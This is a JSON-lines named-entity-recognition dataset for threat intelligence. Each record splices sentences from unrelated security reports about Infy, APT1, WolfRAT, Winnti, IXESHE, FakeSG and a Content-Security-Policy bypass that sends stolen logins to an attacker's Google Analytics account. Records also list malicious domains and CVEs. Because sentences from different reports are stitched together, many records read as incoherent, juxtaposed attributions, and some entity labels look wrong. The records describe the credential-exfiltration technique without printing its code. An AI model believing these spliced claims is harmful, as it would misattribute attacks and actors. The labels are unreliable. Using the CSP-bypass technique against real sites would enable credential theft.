{"text": "] comuseraccount [ . The Infy group also appears to engage in espionage activities against foreign governments and businesses . This is supported by contextual information on the Internet for the email address \u201c lfengg@163.com , \u201d which was supplied in the registration information for seven of the 107 zones . CSP can define a list of domains that the browser should be allowed to interact with for the visited URL .", "spans": [{"start": 25, "end": 35, "label": "Organization"}, {"start": 99, "end": 110, "label": "Organization"}, {"start": 115, "end": 125, "label": "Organization"}, {"start": 196, "end": 201, "label": "System"}, {"start": 212, "end": 226, "label": "Indicator"}, {"start": 311, "end": 314, "label": "System"}]}
{"text": "] websiteaccounts-fb [ . In order to initially compromise the designated targets , Infy typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks . On the site \u201c www.china-one.org , \u201d the email address \u201c lfengg@163.com \u201d appears as the contact for the Shanghai Kai Optical Information Technology Co. , Ltd. , a website production company located in a part of Shanghai that is across the river from PLA Unit 61398 . Designed to guard against XSS attacks , CSP helps control which domains can be accessed as part of a page and therefore restricts which domains to share data with .", "spans": [{"start": 2, "end": 24, "label": "Indicator"}, {"start": 162, "end": 166, "label": "System"}, {"start": 213, "end": 230, "label": "Indicator"}, {"start": 239, "end": 244, "label": "System"}, {"start": 255, "end": 269, "label": "Indicator"}, {"start": 312, "end": 346, "label": "Organization"}, {"start": 449, "end": 452, "label": "Organization"}, {"start": 453, "end": 463, "label": "Organization"}, {"start": 492, "end": 503, "label": "Organization"}, {"start": 506, "end": 509, "label": "System"}]}
{"text": "] comakashipro [ . In order to initially compromise the designated targets , the attackers typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks . About half of APT1 \u2019s known zones were named according to three themes : news , technology and business . It even can restrict forms to be sent only to specific hosts , using the form - action directive .", "spans": [{"start": 165, "end": 169, "label": "System"}, {"start": 216, "end": 220, "label": "Organization"}]}
{"text": "] comfeteh-asefa [ . On May 2 , 2016 , Palo Alto Networks published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available . These themes cause APT1 command and control addresses to appear benign at first glance . These restrictions are specified by a list of allowed URIs .", "spans": [{"start": 39, "end": 57, "label": "Organization"}, {"start": 168, "end": 172, "label": "Organization"}, {"start": 317, "end": 321, "label": "Organization"}, {"start": 423, "end": 445, "label": "System"}]}
{"text": "] comlagertha-lothbrok [ . Prior to the distribution of new versions of the agent , the Infy developers appear to consistently conduct tests from local hosts , which indicates that the control and maintenance of the software occurs in the Khorasan Razavi province of Iran , potentially in the city of Mashhad . However , we believe that the hundreds of FQDNs within these zones were created for the purpose of APT1 intrusions . ( Note : these themes are not unique to APT1 or even APT in general . ) The news-themed zones include the names of well-known news media outlets such as CNN , Yahoo and Reuters . By analyzing field data we see a gap in the implementation of CSP , and even for sites that do use it correctly , this creates an open window to exfiltrate data .", "spans": [{"start": 88, "end": 92, "label": "System"}, {"start": 353, "end": 358, "label": "System"}, {"start": 410, "end": 414, "label": "Organization"}, {"start": 468, "end": 472, "label": "Organization"}, {"start": 581, "end": 584, "label": "Organization"}, {"start": 587, "end": 592, "label": "Organization"}, {"start": 597, "end": 604, "label": "Organization"}, {"start": 638, "end": 672, "label": "Vulnerability"}, {"start": 688, "end": 693, "label": "System"}]}
{"text": "] info OpSec fails and use of cryptography While looking at this infrastructure , we identified that one of these domains has directory indexing enabled . On May 2 , 2016 , Palo Alto published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available . However , they also include names referencing English-speaking countries , such as \u201c aunewsonline.com \u201d ( Australia ) , \u201c canadatvsite.com \u201d ( Canada ) , and \u201c todayusa.org \u201d ( U.S . ) . Our demonstration shows how using the Google Analytics API , a web skimmer can send data to be collected in his own account instance .", "spans": [{"start": 173, "end": 182, "label": "Organization"}, {"start": 508, "end": 524, "label": "Indicator"}, {"start": 545, "end": 561, "label": "Indicator"}, {"start": 583, "end": 595, "label": "Indicator"}, {"start": 648, "end": 668, "label": "System"}, {"start": 671, "end": 684, "label": "Organization"}]}
{"text": "This mistake in operational security allowed us to gain visibility into exfiltrated content for a number of devices . Only one client , based in Iran , continued to communicate with the infrastructure . Below is a list of zones registered by APT1 that are newsthemed : As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": [{"start": 242, "end": 246, "label": "Organization"}, {"start": 272, "end": 288, "label": "System"}, {"start": 307, "end": 310, "label": "System"}, {"start": 370, "end": 378, "label": "Organization"}]}
{"text": "Continued mirroring suggests it is likely a regularly cleaned staging server . A researcher has attributed a recently publicized attack on Citrix' internal network to the Iranian-linked group known as IRIDIUM \u2013 and said that the data heist involved 6 terabytes of sensitive data . aoldaily.com aunewsonline.com canadatvsite.com canoedaily.com cnndaily.com cnndaily.net cnnnewsdaily.com defenceonline.net freshreaders.net giftnews.org reutersnewsonline.com rssadvanced.org saltlakenews.org sportreadok.net todayusa.org usapappers.com usnewssite.com yahoodaily.com . Our gathered field data shows the following statistics on CSP usage across the Internet ( based on HTTPArchive March 2020 scan ):", "spans": [{"start": 139, "end": 146, "label": "Organization"}, {"start": 281, "end": 293, "label": "Indicator"}, {"start": 294, "end": 310, "label": "Indicator"}, {"start": 311, "end": 327, "label": "Indicator"}, {"start": 328, "end": 342, "label": "Indicator"}, {"start": 343, "end": 355, "label": "Indicator"}, {"start": 356, "end": 368, "label": "Indicator"}, {"start": 369, "end": 385, "label": "Indicator"}, {"start": 386, "end": 403, "label": "Indicator"}, {"start": 404, "end": 420, "label": "Indicator"}, {"start": 421, "end": 433, "label": "Indicator"}, {"start": 434, "end": 455, "label": "Indicator"}, {"start": 456, "end": 471, "label": "Indicator"}, {"start": 472, "end": 488, "label": "Indicator"}, {"start": 489, "end": 504, "label": "Indicator"}, {"start": 505, "end": 517, "label": "Indicator"}, {"start": 518, "end": 532, "label": "Indicator"}, {"start": 533, "end": 547, "label": "Indicator"}, {"start": 548, "end": 562, "label": "Indicator"}, {"start": 623, "end": 626, "label": "System"}, {"start": 644, "end": 652, "label": "System"}, {"start": 664, "end": 675, "label": "System"}]}
{"text": "We sourced the over 561MB of exfiltrated data from this domain alone , all of which we found to be 7z compressed and password protected . \" IRIDIUM has hit more than 200 government agencies , oil and gas companies and technology companies , including Citrix Systems Inc \" , they said . The technology-themed zones reference well-known technology companies ( AOL , Apple , Google , Microsoft ) , antivirus vendors ( McAfee , Symantec ) , and products ( Blackberry , Bluecoat ) . Looking at the top 3 M domains , only 210 K use CSP .", "spans": [{"start": 170, "end": 189, "label": "Organization"}, {"start": 192, "end": 195, "label": "Organization"}, {"start": 200, "end": 213, "label": "Organization"}, {"start": 218, "end": 238, "label": "Organization"}, {"start": 251, "end": 269, "label": "Organization"}, {"start": 358, "end": 361, "label": "Organization"}, {"start": 364, "end": 369, "label": "Organization"}, {"start": 372, "end": 378, "label": "Organization"}, {"start": 381, "end": 390, "label": "Organization"}, {"start": 415, "end": 421, "label": "Organization"}, {"start": 424, "end": 432, "label": "Organization"}, {"start": 452, "end": 462, "label": "Organization"}, {"start": 465, "end": 473, "label": "Organization"}, {"start": 526, "end": 529, "label": "System"}]}
{"text": "Password generation for compressed files takes place client-side with each device using a unique key in most scenarios . Citrix told Threatpost that this is indeed the same password-spraying attack it announced itself last week \u2013 but it wouldn't confirm the other details in Resecurity 's post , including the attribution . APT1 also used more generic names referencing topics like software : Most do n\u2019t even do much besides Since the most common allowed domain is google-analytics.com ( 17 K websites )", "spans": [{"start": 121, "end": 127, "label": "Organization"}, {"start": 275, "end": 285, "label": "Organization"}, {"start": 324, "end": 328, "label": "Organization"}, {"start": 466, "end": 486, "label": "Indicator"}]}
{"text": "Key information consists of an MD5 hash of the device 's Android ID , the device manufacturer , and the device model with each separated by an underscore . In wake of these events , a security firm Resecurity reached out to NBC news and claimed that they had reasons to believe that the attacks were carried out by Iranian-linked group known as IRIDIUM . globalowa.com gmailboxes.com hugesoft.org idirectech.com ifexcel.com infosupports.com livemymsn.com mcafeepaying.com microsoft-update-info.com micyuisyahooapis.com msnhome.org pcclubddk.net progammerli.com softsolutionbox.net symanteconline.net webservicesupdate.com . We took google - analytics as an example , but other services can also be used .", "spans": [{"start": 57, "end": 64, "label": "System"}, {"start": 184, "end": 197, "label": "Organization"}, {"start": 198, "end": 208, "label": "Organization"}, {"start": 355, "end": 368, "label": "Indicator"}, {"start": 369, "end": 383, "label": "Indicator"}, {"start": 384, "end": 396, "label": "Indicator"}, {"start": 397, "end": 411, "label": "Indicator"}, {"start": 412, "end": 423, "label": "Indicator"}, {"start": 424, "end": 440, "label": "Indicator"}, {"start": 441, "end": 454, "label": "Indicator"}, {"start": 455, "end": 471, "label": "Indicator"}, {"start": 472, "end": 497, "label": "Indicator"}, {"start": 498, "end": 518, "label": "Indicator"}, {"start": 519, "end": 530, "label": "Indicator"}, {"start": 531, "end": 544, "label": "Indicator"}, {"start": 545, "end": 560, "label": "Indicator"}, {"start": 561, "end": 580, "label": "Indicator"}, {"start": 581, "end": 599, "label": "Indicator"}, {"start": 600, "end": 621, "label": "Indicator"}, {"start": 632, "end": 650, "label": "System"}]}
{"text": "Visually , this can be represented as follows : Android ID When combined with our analysis of indexed directories on C2 infrastructure , we were able to easily automate the generation of the password used by each device and , in turn , successfully decompress all exfiltrated content from compromised devices . Resecurity says that IRIDIUM \" has hit more than 200 government agencies , oil and gas companies , and technology companies including Citrix . Finally , some zones used by APT1 reflect a business theme . As an example , we took the twitter login page , which implemented the following CSP rule ( which contains ): The following short JS code inserted into the site will send the credentials to google - analytics console controlled by us : The UA-#######- # parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account .", "spans": [{"start": 48, "end": 55, "label": "System"}, {"start": 311, "end": 321, "label": "Organization"}, {"start": 364, "end": 383, "label": "Organization"}, {"start": 386, "end": 389, "label": "Organization"}, {"start": 394, "end": 407, "label": "Organization"}, {"start": 414, "end": 434, "label": "Organization"}, {"start": 445, "end": 451, "label": "Organization"}, {"start": 483, "end": 487, "label": "Organization"}, {"start": 596, "end": 599, "label": "System"}, {"start": 804, "end": 820, "label": "System"}]}
{"text": "Indexed directories on C2 infrastructure While exfiltrated content is encrypted , information used to generate the password is plainly visible in the top level directories for each device . Resecurity claims that IRIDIUM breached Citrix 's network during December 2018 . The names suggest websites that professionals might visit : Instead of using twitter \u2019s google - analytic account , we used an account we control .", "spans": [{"start": 190, "end": 200, "label": "Organization"}, {"start": 230, "end": 236, "label": "Organization"}, {"start": 348, "end": 384, "label": "System"}]}
{"text": "Taking this information from directory listings , like the one shown above , allowed for the decryption of all content . Infy engaged in malware spearphishing against the same targets as Flying Kitten from the outset of its campaign ; Operation Cleaver has registered several resources related to development agencies that have been the subject of intrusion attempts by others since February 2014 . advanbusiness.com businessconsults.net businessformars.com companyinfosite.com conferencesinfo.com copporationnews.com . Unfortunately , the CSP policy ca n\u2019t discriminate based on the Tag ID .", "spans": [{"start": 121, "end": 125, "label": "System"}, {"start": 297, "end": 317, "label": "Organization"}, {"start": 399, "end": 416, "label": "Indicator"}, {"start": 417, "end": 437, "label": "Indicator"}, {"start": 438, "end": 457, "label": "Indicator"}, {"start": 458, "end": 477, "label": "Indicator"}, {"start": 478, "end": 497, "label": "Indicator"}, {"start": 498, "end": 517, "label": "Indicator"}, {"start": 540, "end": 543, "label": "System"}]}
{"text": "In this case , FrozenCell has primarily netted the actors behind it with recorded outbound calls followed closely by images and recorded incoming calls . The malicious samples we found are the early stage malware most often delivered by spear-phishing e-mails . APT1 intruders often use the FQDNs that are associated with legitimate websites hosted by their hop points . Though Google meant to have this parameter be used to mention the page the user visited , we used it to exfiltrate the user name and password data encoded in base64 .", "spans": [{"start": 15, "end": 25, "label": "Malware"}, {"start": 262, "end": 266, "label": "Organization"}, {"start": 291, "end": 296, "label": "System"}, {"start": 378, "end": 384, "label": "Organization"}, {"start": 529, "end": 535, "label": "Indicator"}]}
{"text": "FrozenCell is part of a very successful , multi-platform surveillance campaign . This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name \u2014 either KBDLV2.DLL or AUTO.DLL , depending on the malware sample . We consider these domains to be \u201c hijacked \u201d because they were registered by someone for a legitimate reason , but have been leveraged by APT1 for malicious purposes . In our Google Analytics platform , we will see the data as : In our demo the DP will result in page view of Which will be decoded from base64 as : The source of the problem is that the CSP rule system is n\u2019t granular enough .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 208, "end": 218, "label": "Malware"}, {"start": 222, "end": 230, "label": "Malware"}, {"start": 405, "end": 409, "label": "Organization"}, {"start": 442, "end": 467, "label": "System"}, {"start": 570, "end": 576, "label": "Indicator"}, {"start": 620, "end": 635, "label": "System"}]}
{"text": "Attackers are growing smarter , targeting individuals through the devices and the services they use most . At this stage , the malware gathers information about the infected computer . APT1 uses hijacked FQDNs for two main purposes . Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data ( in this case the user \u2019s email address and password ) .", "spans": [{"start": 135, "end": 154, "label": "Malware"}, {"start": 185, "end": 189, "label": "Organization"}, {"start": 204, "end": 209, "label": "System"}]}
{"text": "Government agencies and enterprises should plan to be hit from all angles - cloud services , mobile devices , laptops - in order to build comprehensive security strategies that work . Hancom Office is widely used in South Korea . First , they place malware ( usually in ZIP files ) on the legitimate websites hosted on the hop point and then send spear phishing emails with a link that includes the legitimate FQDN . One might think we could have updated the CSP to only allow specific TIDs : .", "spans": [{"start": 270, "end": 273, "label": "System"}, {"start": 362, "end": 368, "label": "System"}, {"start": 410, "end": 414, "label": "System"}, {"start": 459, "end": 462, "label": "System"}]}
{"text": "TUESDAY , MAY 19 , 2020 The wolf is back ... NEWS SUMMARY Thai Android devices and users are being targeted by a modified version of DenDroid we are calling \" WolfRAT , '' now targeting messaging apps like WhatsApp , Facebook Messenger and Line . Perhaps it also points to the suspected North Korean origin of attack . APT12 . The problem is that CSP does n't support query strings ( See Spec ):", "spans": [{"start": 63, "end": 70, "label": "System"}, {"start": 133, "end": 141, "label": "Malware"}, {"start": 159, "end": 166, "label": "Malware"}, {"start": 206, "end": 214, "label": "System"}, {"start": 217, "end": 235, "label": "System"}, {"start": 240, "end": 244, "label": "System"}, {"start": 319, "end": 324, "label": "Organization"}, {"start": 347, "end": 350, "label": "System"}]}
{"text": "We assess with high confidence that this modified version is operated by the infamous Wolf Research . The attacker is from North Korea . This research paper will delve into another prominent group of attackers referred to as \u201c IXESHE \u201d ( pronounced \u201c i-sushi \u201d ) , based on one of the more common detection names security companies use for the malware they utilize . Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts .", "spans": [{"start": 86, "end": 99, "label": "Organization"}, {"start": 227, "end": 233, "label": "Organization"}, {"start": 433, "end": 436, "label": "System"}, {"start": 437, "end": 551, "label": "Indicator"}]}
{"text": "This actor has shown a surprising level of amateur actions , including code overlaps , open-source project copy/paste , classes never being instanced , unstable packages and unsecured panels . All of them lie in ranges of the Jilin Province Network and Liaoning Province Network , in China . This campaign is notable for targeting East Asian governments , electronics manufacturers , and a telecommunications company . A possible solution would come from adaptive URLs , adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts .", "spans": []}
{"text": "EXECUTIVE SUMMARY Cisco Talos has discovered a new Android malware based on a leak of the DenDroid malware family . Finally , this geo-location supports the likely theory that the attackers behind Kimsuky are based in North Korea . The IXESHE campaign makes use of targeted emails with malicious attachments to compromise victims \u2019 systems . A more granular future direction for strengthening CSP direction to consider as part of the CSP standard is XHR proxy enforcement .", "spans": [{"start": 18, "end": 29, "label": "Organization"}, {"start": 90, "end": 98, "label": "Malware"}, {"start": 197, "end": 204, "label": "Organization"}, {"start": 236, "end": 242, "label": "Organization"}, {"start": 274, "end": 280, "label": "System"}]}
{"text": "We named this malware \" WolfRAT '' due to strong links between this malware ( and the command and control ( C2 ) infrastructure ) and Wolf Research , an infamous organization that developed interception and espionage-based malware and was publicly described by CSIS during Virus Bulletin 2018 . In this blog , we look at the Winnti malware implant as used by two known activity groups BARIUM and LEAD . The emails are often tailored for specific victims and contain malicious attachments that are almost always \u201c weaponized \u201d .PDF files with known exploits that drop malware executables onto targeted systems . This will essentially create a client - side WAF that can enforce a policy on where specific data field are allowed to be transmitted .", "spans": [{"start": 24, "end": 31, "label": "Malware"}, {"start": 134, "end": 147, "label": "Organization"}, {"start": 325, "end": 339, "label": "System"}, {"start": 385, "end": 391, "label": "Organization"}, {"start": 407, "end": 413, "label": "System"}, {"start": 526, "end": 530, "label": "Indicator"}]}
{"text": "We identified infrastructure overlaps and string references to previous Wolf Research work . According to the German press , the intruders used the Winnti family of malware as their main implant , giving them persistent access to the conglomerate 's network as early as February 2016 . In addition , the IXESHE attackers conducted two specific attacks that leveraged zero-day exploits\u2014one in 2009 and another in 2011 . In addition to the complexity of managing CSP rules , this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection .", "spans": [{"start": 72, "end": 85, "label": "Organization"}, {"start": 148, "end": 172, "label": "System"}, {"start": 304, "end": 310, "label": "Organization"}, {"start": 367, "end": 375, "label": "Vulnerability"}, {"start": 434, "end": 470, "label": "Vulnerability"}, {"start": 478, "end": 491, "label": "Vulnerability"}, {"start": 531, "end": 547, "label": "System"}]}
{"text": "The organization appears to be shut down , but the threat actors are still very active . In the case of this malware , the activity groups strongly associated with Winnti are BARIUM and LEAD . The IXESHE attackers almost always make use of compromised servers as command-and-control ( C&C ) servers . Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": [{"start": 164, "end": 170, "label": "System"}, {"start": 175, "end": 181, "label": "System"}, {"start": 186, "end": 190, "label": "System"}, {"start": 197, "end": 203, "label": "Organization"}, {"start": 263, "end": 282, "label": "System"}, {"start": 285, "end": 288, "label": "System"}, {"start": 344, "end": 352, "label": "Organization"}, {"start": 368, "end": 379, "label": "Malware"}, {"start": 396, "end": 406, "label": "Malware"}]}
{"text": "We identified campaigns targeting Thai users and their devices . But even though they share the use of Winnti , the BARIUM and LEAD activity groups are involved in very different intrusion scenarios . In some cases , the compromised servers are hosted on target organizations \u2019 networks after successful infiltration so the attackers can increase their control of the victims \u2019 infrastructure . Instead , victims would end up infecting their computers with the NetSupport RAT , allowing threat actors to gain remote access and deliver additional payloads .", "spans": [{"start": 103, "end": 109, "label": "System"}, {"start": 116, "end": 122, "label": "System"}, {"start": 127, "end": 131, "label": "System"}, {"start": 405, "end": 412, "label": "Organization"}, {"start": 461, "end": 475, "label": "System"}]}
{"text": "Some of the C2 servers are located in Thailand . To show how this breach and similar breaches can be mitigated , we look at how Windows Defender ATP flags activities associated with BARIUM , LEAD , and other known activity groups and how it provides extensive threat intelligence about these groups . Using this approach , the attackers amassed at least 60 C&C servers over time . As we have seen over the years , SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz .", "spans": [{"start": 128, "end": 148, "label": "Organization"}, {"start": 357, "end": 360, "label": "System"}, {"start": 414, "end": 424, "label": "Malware"}, {"start": 572, "end": 585, "label": "System"}, {"start": 589, "end": 597, "label": "System"}]}
{"text": "The panels also contain Thai JavaScript comments and the domain names also contain references to Thai food , a tactic commonly employed to entice users to click/visit these C2 panels without much disruption . BARIUM begins its attacks by cultivating relationships with potential victims\u2014particularly those working in Business Development or Human Resources\u2014on various social media platforms . This technique also allows the attackers to cover their tracks , as having the C&C server in the victims \u2019 corporate networks means very little C&C traffic leaves them . The new campaign , which we call FakeSG , also relies on hacked WordPress websites to display a custom landing page mimicking the victim 's browser .", "spans": [{"start": 368, "end": 380, "label": "Organization"}, {"start": 472, "end": 475, "label": "System"}, {"start": 537, "end": 540, "label": "System"}, {"start": 571, "end": 579, "label": "Organization"}, {"start": 596, "end": 602, "label": "Malware"}, {"start": 620, "end": 645, "label": "System"}]}
{"text": "We identified a notable lack of sophistication in this investigation such as copy/paste , unstable code , dead code and panels that are freely open . During these intrusions , LEAD 's objective was to steal sensitive data , including research materials , process documents , and project plans . The attackers \u2019 deliberate use of compromised machines and dynamic Domain Name System ( DNS ) services allows them to hide traces of their presence by confusing their activities with data belonging to legitimate individuals . The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut .", "spans": [{"start": 362, "end": 380, "label": "Indicator"}, {"start": 383, "end": 386, "label": "Indicator"}, {"start": 525, "end": 538, "label": "Organization"}, {"start": 556, "end": 570, "label": "System"}]}
{"text": "What 's new ? Initial intrusion stages feature the Win32/Barlaiy implant\u2014notable for its use of social network profiles , collaborative document editing sites , and blogs for C&C . Looking at threat intelligence derived from tracking APT campaigns over time primarily based on the network traffic generated by the malware used , we were able to develop indicators of compromise for the IXESHE campaign . While FakeSG appears to be a newcomer , it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could potentially rival with SocGholish .", "spans": [{"start": 51, "end": 64, "label": "System"}, {"start": 89, "end": 119, "label": "Malware"}, {"start": 122, "end": 158, "label": "Malware"}, {"start": 165, "end": 178, "label": "Malware"}, {"start": 386, "end": 392, "label": "Organization"}, {"start": 410, "end": 416, "label": "Malware"}, {"start": 587, "end": 597, "label": "Malware"}]}
{"text": "WolfRAT is based on a previously leaked malware named DenDroid . Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads , compiled HTML help ( .chm ) files , or Microsoft Office documents containing macros or exploits . The malware samples used in this campaign were not very complicated by nature but do give the attackers almost complete control over their targets \u2019 compromised systems . We first heard of this new campaign thanks to a Mastodon post by Randy McEoin .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 54, "end": 62, "label": "Malware"}, {"start": 150, "end": 173, "label": "System"}, {"start": 207, "end": 225, "label": "System"}, {"start": 228, "end": 232, "label": "Malware"}, {"start": 273, "end": 297, "label": "System"}, {"start": 303, "end": 329, "label": "System"}, {"start": 560, "end": 568, "label": "Organization"}, {"start": 581, "end": 589, "label": "Organization"}, {"start": 598, "end": 610, "label": "Organization"}]}
{"text": "The new malware appears to be linked to the infamous Wolf Research organization and targets Android devices located in Thailand . Instead , the group often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware . Most of the IP addresses of IXESHE \u2019s victims are linked to DSL networks , which made it difficult to determine their identities . The tactics , techniques and procedures ( TTPs ) are very similar to those of SocGholish and it would be easy to think the two are related .", "spans": [{"start": 53, "end": 66, "label": "Organization"}, {"start": 92, "end": 99, "label": "System"}, {"start": 172, "end": 188, "label": "System"}, {"start": 337, "end": 343, "label": "Organization"}, {"start": 369, "end": 372, "label": "System"}, {"start": 518, "end": 528, "label": "Malware"}]}
{"text": "How did it work ? Microsoft Analytics shows that Winnti has been used in intrusions carried out throughout Asia , Europe , Oceania , the Middle East , and the United States in the last six months ( Figure 1 ) . Careful research , however , allowed the identification of some of the attackers \u2019 victims : East Asian governments , Taiwanese electronics manufacturers , A telecommunications company . In fact , this chain also leads to NetSupport RAT .", "spans": [{"start": 18, "end": 37, "label": "Organization"}, {"start": 49, "end": 55, "label": "System"}, {"start": 433, "end": 447, "label": "System"}]}
{"text": "The malware mimics legit services such as Google service , GooglePlay or Flash update . Instead , Lead often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware . Campaign victims were identified by using Whois records and open source research . As a result , we decided to call this variant FakeSG .", "spans": [{"start": 42, "end": 48, "label": "Organization"}, {"start": 59, "end": 69, "label": "System"}, {"start": 73, "end": 78, "label": "System"}, {"start": 125, "end": 141, "label": "System"}, {"start": 304, "end": 309, "label": "System"}, {"start": 391, "end": 397, "label": "Malware"}]}
{"text": "The malware is not really advanced and is based on a lot of copy/paste from public sources available on the Internet . In some other cases , LEAD gains access to a target by brute-forcing remote access login credentials , performing SQL injection , or exploiting unpatched web servers , and then they copy the Winnti installer directly to compromised machines . Trend Micro generally notifies customers that are believed to have been specifically targeted by APT campaigns . 2023 - 07 - 19 Update : On June 5 , @SecurityAura described an unknown campaign using .hta payloads disguised as driver updates .", "spans": [{"start": 310, "end": 326, "label": "System"}, {"start": 362, "end": 373, "label": "Organization"}, {"start": 511, "end": 524, "label": "Organization"}]}
{"text": "The C2 infrastructure contains a lack of sophistication such as open panels , reuse of old servers publicly tagged as malicious\u2026 So what ? This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER.DLL \" to disguise it as the DLL for the ASP.NET ISAPI Filter . The IXESHE attackers have been actively launching highly targeted attacks since at least July 2009 . On June 22 , @AnFam17 spotted the same fake browser update leveraging URL shortcuts .", "spans": [{"start": 231, "end": 248, "label": "Malware"}, {"start": 285, "end": 305, "label": "Malware"}, {"start": 312, "end": 318, "label": "Organization"}, {"start": 422, "end": 430, "label": "Organization"}]}
{"text": "After being publicly denounced by CSIS Group \u2014 a threat intelligence company in Denmark \u2014 Wolf Research was closed and a new organization named LokD was created . Windows Defender ATP helps network security professionals deal with intrusions from activity groups like LEAD and BARIUM in several ways . Available data on the IXESHE campaign indicates that targeted emails with malicious .PDF file attachments were the attackers \u2019 vector of choice . Both of these campaigns use a similar structure with compromised WordPress sites hosting the lure shortcuts and a WebDav server that loads NetSupport RAT .", "spans": [{"start": 34, "end": 44, "label": "Organization"}, {"start": 90, "end": 103, "label": "Organization"}, {"start": 144, "end": 148, "label": "Organization"}, {"start": 163, "end": 183, "label": "Organization"}, {"start": 268, "end": 272, "label": "System"}, {"start": 277, "end": 283, "label": "System"}, {"start": 324, "end": 330, "label": "Organization"}, {"start": 364, "end": 370, "label": "System"}, {"start": 386, "end": 390, "label": "Indicator"}, {"start": 513, "end": 528, "label": "System"}, {"start": 562, "end": 575, "label": "System"}]}
{"text": "This new organization seems to work on securing Android devices . The following examples were developed using a Winnti installer that was used in attacks in December 2016 . In most cases , the attacks involved Adobe Acrobat , Reader , and Flash Player exploits such as : CVE-2009-4324 , CVE-2009-0927 , CVE-2011-0609 , CVE-2011-0611 . RussianPanda ( @AnFam17 ) named the URL shortcut campaign RogueRaticate .", "spans": [{"start": 48, "end": 55, "label": "Organization"}, {"start": 112, "end": 128, "label": "System"}, {"start": 210, "end": 223, "label": "System"}, {"start": 226, "end": 232, "label": "System"}, {"start": 239, "end": 251, "label": "System"}, {"start": 271, "end": 284, "label": "Vulnerability"}, {"start": 287, "end": 300, "label": "Vulnerability"}, {"start": 303, "end": 316, "label": "Vulnerability"}, {"start": 319, "end": 332, "label": "Vulnerability"}, {"start": 335, "end": 347, "label": "Organization"}, {"start": 393, "end": 406, "label": "Malware"}]}
{"text": "However , thanks to the infrastructure sharing and forgotten panel names , we assess with high confidence that this actor is still active , it is still developing malware and has been using it from mid-June to today . The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat . It should also be noted that this campaign used CVE-2009-4324 and CVE-2011-0609 exploits when these were still unpatched or considered zero-day vulnerabilities . FakeSG has different browser templates depending on which browser the victim is running .", "spans": [{"start": 222, "end": 248, "label": "System"}, {"start": 254, "end": 280, "label": "Malware"}, {"start": 284, "end": 304, "label": "Organization"}, {"start": 323, "end": 336, "label": "Organization"}, {"start": 446, "end": 459, "label": "Vulnerability"}, {"start": 464, "end": 477, "label": "Vulnerability"}, {"start": 533, "end": 541, "label": "Vulnerability"}, {"start": 560, "end": 566, "label": "Malware"}]}
{"text": "On the C2 panel , we found a potential link between Wolf Research and another Cyprus organization named Coralco Tech . LEAD and BARIUM are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time . The IXESHE attackers also used an exploit that affected Microsoft Excel \u2014 CVE-2009-3129 . The themed \" updates \" look very professional and are more up to date than its SocGholish counterpart .", "spans": [{"start": 52, "end": 65, "label": "Organization"}, {"start": 104, "end": 116, "label": "Organization"}, {"start": 205, "end": 218, "label": "Organization"}, {"start": 324, "end": 330, "label": "Organization"}, {"start": 376, "end": 385, "label": "Organization"}, {"start": 386, "end": 391, "label": "System"}, {"start": 394, "end": 407, "label": "Vulnerability"}, {"start": 489, "end": 499, "label": "Malware"}]}
{"text": "This organization is also working on interception technology . And , finally , with the upcoming Creators Update , Windows Defender ATP will provide additional capabilities for detecting threats such as Winnti , as well as centralized response options , such as machine isolation and file blocking , that will enable fast containment of known attack jump off points . Every IXESHE case we examined revealed that the original infection vector was a targeted email with a PDF exploit as attachment . Compromised websites ( WordPress appears to be the top target ) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates .", "spans": [{"start": 97, "end": 112, "label": "System"}, {"start": 115, "end": 135, "label": "Organization"}, {"start": 374, "end": 380, "label": "Organization"}, {"start": 457, "end": 462, "label": "System"}, {"start": 470, "end": 473, "label": "System"}, {"start": 498, "end": 518, "label": "System"}, {"start": 521, "end": 530, "label": "Organization"}]}
{"text": "LINKS TO WOLF INTELLIGENCE During the Virus Bulletin conference in 2018 , CSIS researchers Beno\u00eet Ancel and Aleksejs Kuprins did a presentation on Wolf Research and the offensive arsenal developed by the organization . The police suspected Lurk of stealing nearly three billion rubles , using malicious software to systematically withdraw large sums of money from the accounts of commercial organizations , including banks . Older versions also used an XLS exploit . The source code is loaded from one of several domains impersonating Google ( google - analytiks[.]com ) or Adobe ( updateadobeflash[.]website ): That code contains all the web elements ( images , fonts , text ) needed to render the fake browser update page .", "spans": [{"start": 74, "end": 78, "label": "Organization"}, {"start": 147, "end": 160, "label": "Organization"}, {"start": 240, "end": 244, "label": "System"}, {"start": 380, "end": 404, "label": "Organization"}, {"start": 417, "end": 422, "label": "Organization"}, {"start": 453, "end": 456, "label": "System"}, {"start": 535, "end": 541, "label": "System"}, {"start": 574, "end": 579, "label": "System"}]}
